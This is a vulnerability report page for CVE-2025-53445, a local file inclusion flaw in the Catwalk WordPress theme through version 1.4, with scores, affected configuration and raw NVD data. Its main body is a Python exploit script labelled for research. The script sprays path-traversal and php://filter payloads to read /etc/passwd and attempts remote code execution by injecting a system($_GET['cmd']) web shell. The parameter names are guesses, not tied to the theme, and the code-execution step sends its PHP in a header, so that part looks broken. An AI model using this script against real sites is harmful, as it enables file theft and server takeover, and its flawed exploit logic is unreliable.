Security Vulnerability Report
中文
CVE-2025-53445 CVSS 8.1 HIGH

CVE-2025-53445

Published: 2025-12-18 08:15:55
Last Modified: 2026-01-20 15:16:58

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Catwalk catwalk allows PHP Local File Inclusion.This issue affects Catwalk: from n/a through <= 1.4.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:axiomthemes:catwalk:*:*:*:*:*:wordpress:*:* - VULNERABLE
Catwalk Theme <= 1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53445 PoC - Catwalk Theme Local File Inclusion # Affected: axiomthemes Catwalk WordPress Theme <= 1.4 # Type: PHP Local File Inclusion import requests import sys def test_lfi(target_url, file_path='/etc/passwd'): """ Test for Local File Inclusion vulnerability in Catwalk theme """ # Common vulnerable parameters in WordPress themes vulnerable_params = ['template', 'page', 'file', 'theme', 'load', 'inc'] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } for param in vulnerable_params: # Try common LFI patterns payloads = [ f'../../../../{file_path}', f'....//....//....//....//{file_path}', f'php://filter/convert.base64-encode/resource={file_path}', f'/../../../{file_path}' ] for payload in payloads: try: test_url = f"{target_url}?{param}={payload}" response = requests.get(test_url, headers=headers, timeout=10, verify=False) # Check for file content indicators if 'root:' in response.text or 'bin:' in response.text: print(f'[+] VULNERABLE! Parameter: {param}') print(f'[+] Payload: {payload}') print(f'[+] Response length: {len(response.text)}') return True except requests.RequestException as e: print(f'[-] Error testing {param}: {e}') return False def test_rce(target_url): """ Test for RCE after LFI - using PHP wrapper """ # Test PHP code execution via LFI + wrapper rce_payload = 'php://input' headers = { 'User-Agent': 'Mozilla/5.0', 'Content-Type': 'application/x-www-form-urlencoded', 'phpcode': '<?php echo "VULN_CVE_2025_53445"; system($_GET["cmd"]); ?>' } test_url = f"{target_url}?page={rce_payload}" try: response = requests.post(test_url, headers=headers, timeout=10, verify=False) if 'VULN_CVE_2025_53445' in response.text: print('[+] Remote Code Execution Confirmed!') return True except: pass return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-53445-poc.py <target_url>') print('Example: python cve-2025-53445-poc.py http://target.com/wp-content/themes/catwalk/') sys.exit(1) target = sys.argv[1] print(f'[*] Testing CVE-2025-53445 on {target}') if test_lfi(target): print('[+] LFI Vulnerability Detected') test_rce(target) else: print('[-] No vulnerability detected or target not affected')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53445", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:15:54.887", "lastModified": "2026-01-20T15:16:57.630", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Catwalk catwalk allows PHP Local File Inclusion.This issue affects Catwalk: from n/a through <= 1.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:axiomthemes:catwalk:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.4", "matchCriteriaId": "B7585D8A-FF40-409C-815A-93E84BBC5BAB"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/catwalk/vulnerability/wordpress-catwalk-theme-1-4-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}